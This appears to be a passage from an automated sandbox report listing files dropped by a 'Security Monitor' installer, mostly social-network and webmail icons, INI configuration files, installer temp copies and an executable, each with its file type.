C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\myspace.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\myspace.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\odnoklassniki.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\odnoklassniki.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\qqzone.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\qqzone.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\twitter.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\twitter.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\vkontakte.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\vkontakte.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\youtube.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\youtube.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\GMX.com.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Gmail.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Mail.RU.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Mail.com.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Outlook Mail.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Outlook.Live.com.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Yahoo Mail.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Yandex Mail.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\facebook.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\google+.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\imp.free.fr.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\instagram.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-1BANN.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-1H5GM.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-2S7FN.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-BMU88.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-CLQ1O.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-CMR2P.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-DBQ8O.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-E045N.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-F145G.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-GBLMG.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-ICR5Q.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-IPM34.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-ITOJ2.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-KK2D4.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-LSETV.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-MLP8K.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-O6VAJ.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-PF7TR.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-RE78N.tmp
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-RQFTQ.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-TJSQR.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-TOLJ8.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-TOVFB.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-VL6F7.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\linkedin.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\mail.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\mail.png (copy)
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\messagerie.orange.fr.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\my.screenname.aol.com.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\myspace.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\odnoklassniki.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\qqzone.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\twitter.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\twitter_.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\vkontakte.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\youtube.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\SNets.ini (copy)
|
Generic INItialization configuration [Instagram]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\default.ini (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki.ini (copy)
|
Generic INItialization configuration [Marks]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\About.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\Friends.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\Guests.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\Marks.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\Photos.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\Profiles.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-485DE.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-712T6.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-8NBOB.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-ONLQJ.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-UF67N.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-UOPS2.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte.ini (copy)
|
Generic INItialization configuration [Friends]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\Friends.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\Messages.png (copy)
|
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\Notifications.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\Replies.png (copy)
|
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\is-0IL3A.tmp
|
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\is-8V04V.tmp
|
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\is-A5OI3.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\is-K0FLF.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook.ini (copy)
|
Generic INItialization configuration [News]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Apps.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Events.png (copy)
|
PNG image data, 15 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Facebook Ads.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Find friends.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Friends List.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Friends.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Gifts.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Groups.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Invite friends.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Messages.png (copy)
|
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\News.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Notifications.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Payments.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Privacy.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Security.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Settings.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Subscribers.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Welcome.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-01GJ3.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-0MLLB.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-0U82B.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-1MBBO.tmp
|
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-3L1ST.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-88DB9.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-B6VC8.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-BJSHI.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-CIS06.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-FVVAU.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-HBM2T.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-HDK7S.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-J4QLD.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-K5INR.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-KN6US.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-P5ULQ.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-UFLBF.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-VSA1C.tmp
|
PNG image data, 15 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\is-AOLNP.tmp
|
Generic INItialization configuration [Marks]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\is-N6CHK.tmp
|
Generic INItialization configuration [News]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\is-RERTQ.tmp
|
Generic INItialization configuration [Friends]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\is-1NAQA.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\is-7NH8Q.tmp
|
Generic INItialization configuration [Instagram]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\ru\default.ini (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\ru\is-H6FGP.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\zh\default.ini (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\zh\is-8MNTC.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SearchEn\SearchEn.ini (copy)
|
Generic INItialization configuration [Bing]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SearchEn\is-0EGJF.tmp
|
Generic INItialization configuration [Bing]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\is-P3F7J.tmp
|
Unicode text, UTF-8 (with BOM) text, with very long lines (4429), with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\url_cat (copy)
|
Unicode text, UTF-8 (with BOM) text, with very long lines (4429), with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ff.exe (copy)
|
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\iMsgInfo.bmp (copy)
|
PC bitmap, Windows 3.x format, 48 x 48 x 24, resolution 2835 x 2835 px/m, cbSize 6966, bits offset 54
|
dropped
|
||
